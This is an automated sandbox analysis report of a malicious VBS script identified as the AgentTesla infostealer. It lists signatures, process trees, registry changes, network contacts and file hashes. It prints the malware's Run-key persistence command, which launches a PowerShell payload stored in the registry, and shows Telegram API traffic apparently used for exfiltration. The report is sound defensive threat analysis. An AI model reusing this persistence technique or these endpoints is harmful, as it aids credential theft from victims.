Analysis Overview
SHA256
e2eb2639ee439ad5cca4736f1cbc7eaf53871480cc92852ee6832b51c8e10b15
Threat Level: Known bad
The file e2eb2639ee439ad5cca4736f1cbc7eaf53871480cc92852ee6832b51c8e10b15.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
outlook_win_path
Modifies registry key
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-05 14:51
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-05 14:51
Reported
2024-06-05 14:53
Platform
win7-20240221-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2304 wrote to memory of 1404 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2304 wrote to memory of 1404 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2304 wrote to memory of 1404 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1404 wrote to memory of 2536 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 1404 wrote to memory of 2536 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 1404 wrote to memory of 2536 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2eb2639ee439ad5cca4736f1cbc7eaf53871480cc92852ee6832b51c8e10b15.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Visitee247.Bou && echo t"
Network
| Country | Destination | Domain | Proto | Count |
| US | 8.8.8.8:53 | onedrive.live.com | udp | 2 |
| US | 13.107.137.11:443 | onedrive.live.com | tcp | 64 |
Files
memory/1404-4-0x000007FEF552E000-0x000007FEF552F000-memory.dmp
memory/1404-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
memory/1404-6-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/1404-7-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-9-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-8-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-10-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-11-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-12-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-13-0x000007FEF552E000-0x000007FEF552F000-memory.dmp
memory/1404-14-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-05 14:51
Reported
2024-06-05 14:53
Platform
win10v2004-20240426-en
Max time kernel
144s
Max time network
150s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Unevangelical191 = "%trianguleredes% -w 1 $multidivisional=(Get-ItemProperty -Path 'HKCU:\\Rematched\\').Cecidogenous;%trianguleredes% ($multidivisional)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2260 set thread context of 3972 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2eb2639ee439ad5cca4736f1cbc7eaf53871480cc92852ee6832b51c8e10b15.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Visitee247.Bou && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Visitee247.Bou && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unevangelical191" /t REG_EXPAND_SZ /d "%trianguleredes% -w 1 $multidivisional=(Get-ItemProperty -Path 'HKCU:\Rematched\').Cecidogenous;%trianguleredes% ($multidivisional)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unevangelical191" /t REG_EXPAND_SZ /d "%trianguleredes% -w 1 $multidivisional=(Get-ItemProperty -Path 'HKCU:\Rematched\').Cecidogenous;%trianguleredes% ($multidivisional)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | h7lqdw.am.files.1drv.com | udp |
| US | 13.107.42.12:443 | h7lqdw.am.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 12.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.137.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 13.107.42.12:443 | h7lqdw.am.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | h7lq1q.am.files.1drv.com | udp |
| US | 13.107.42.12:443 | h7lq1q.am.files.1drv.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gakn2bh1.e3i.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Visitee247.Bou
| MD5 | e9b502edc13397b91e92fe9a43104c6a |
| SHA1 | 2e9d86fb27c8f6fb186894ee7f5ea2cd13a4d154 |
| SHA256 | 349e1e7c9ea18133418255bc3a68defb3bdb6aed1fbc07f696f19cb9b1151075 |
| SHA512 | 15b1c99d0384ddcb0768e537891d4f1782017e58017e4da76aea2a0f8a6562735ac57e2ef007f40da724c9acf064564d95f4d459976dd42c1f26704735f4bb27 |